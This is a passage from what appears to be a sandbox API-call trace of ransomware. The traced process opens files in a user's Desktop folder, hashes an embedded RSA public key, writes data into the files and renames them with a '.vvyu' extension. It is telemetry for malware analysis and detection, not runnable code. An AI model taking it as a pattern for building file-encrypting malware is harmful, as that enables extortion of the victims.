hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0200.394] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x3dec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.394] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0200.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0200.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0200.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0200.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0200.395] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0200.396] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.396] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.396] CloseHandle (hObject=0x510) returned 1 [0200.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x2c2df40 [0200.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x2ea6a68 [0200.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2df40 | out: hHeap=0x620000) returned 1 [0200.398] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\0jip-0WU2n5fd8 POL.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\0jip-0wu2n5fd8 pol.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\0jip-0WU2n5fd8 POL.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\0jip-0wu2n5fd8 pol.bmp.vvyu")) returned 1 [0200.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.399] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2d18 | out: hHeap=0x620000) returned 1 [0200.402] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc16a3410, ftCreationTime.dwHighDateTime=0x1d8a54c, ftLastAccessTime.dwLowDateTime=0xe8b7c10, ftLastAccessTime.dwHighDateTime=0x1d8a6ea, ftLastWriteTime.dwLowDateTime=0xe8b7c10, ftLastWriteTime.dwHighDateTime=0x1d8a6ea, nFileSizeHigh=0x0, nFileSizeLow=0x175a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1OTdzHn.jpg", cAlternateFileName="")) returned 1 [0200.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0200.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x6e2d18 [0200.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0200.402] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\1OTdzHn.jpg") returned=".jpg" [0200.402] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\1OTdzHn.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\1otdzhn.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0200.404] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=95654) returned 1 [0200.404] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0200.407] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x17580, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.407] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.410] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.410] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x175a6, lpOverlapped=0x0) returned 1 [0200.412] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0200.412] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.412] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.412] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0200.414] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0200.414] CryptHashData (hHash=0x2cfe0c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.414] CryptGetHashParam (in: hHash=0x2cfe0c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0200.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0200.414] CryptGetHashParam (in: hHash=0x2cfe0c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0200.414] GetLastError () returned 0x0 [0200.414] CryptDestroyHash (hHash=0x2cfe0c0) returned 1 [0200.414] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0200.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.414] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0200.414] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0200.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.414] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0200.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x175b0) returned 0x2ea99b0 [0200.415] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0200.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0200.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0200.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f978 [0200.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32d8 [0200.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f9c0 [0200.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32f0 [0200.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3320 [0200.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3380 [0200.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3338 [0200.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0200.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0200.416] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0200.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0200.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3320 | out: hHeap=0x620000) returned 1 [0200.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3338 | out: hHeap=0x620000) returned 1 [0200.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3380 | out: hHeap=0x620000) returned 1 [0200.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0200.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3380 [0200.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0200.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3338 [0200.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0200.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3320 [0200.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0200.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0200.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0200.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0200.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0200.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0200.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0200.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0200.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3338 | out: hHeap=0x620000) returned 1 [0200.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3320 | out: hHeap=0x620000) returned 1 [0200.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3380 | out: hHeap=0x620000) returned 1 [0200.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0200.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0200.419] GetCurrentThreadId () returned 0x66c [0200.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0200.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea7ff8 [0200.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0200.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0200.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0200.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0200.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.420] GetCurrentThreadId () returned 0x66c [0200.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0200.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0200.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0200.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0200.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0200.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3380 [0200.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0200.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0200.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0200.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3320 [0200.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0200.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0200.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0200.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0200.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3338 [0200.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0200.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0200.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0200.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3308 [0200.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0200.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3398 [0200.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0200.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3368 [0200.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3350 [0200.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33b0 [0200.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3350 | out: hHeap=0x620000) returned 1 [0200.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3350 [0200.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3368 | out: hHeap=0x620000) returned 1 [0200.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0200.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0200.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0200.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3320 | out: hHeap=0x620000) returned 1 [0200.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3320 [0200.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0200.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3380 | out: hHeap=0x620000) returned 1 [0200.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0200.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33b0 | out: hHeap=0x620000) returned 1 [0200.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0200.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0200.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0200.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3320 | out: hHeap=0x620000) returned 1 [0200.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0200.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0200.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0200.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0200.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0200.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0200.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0200.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0200.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3350 | out: hHeap=0x620000) returned 1 [0200.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3398 | out: hHeap=0x620000) returned 1 [0200.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3338 | out: hHeap=0x620000) returned 1 [0200.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3308 | out: hHeap=0x620000) returned 1 [0200.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0200.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0200.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0200.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 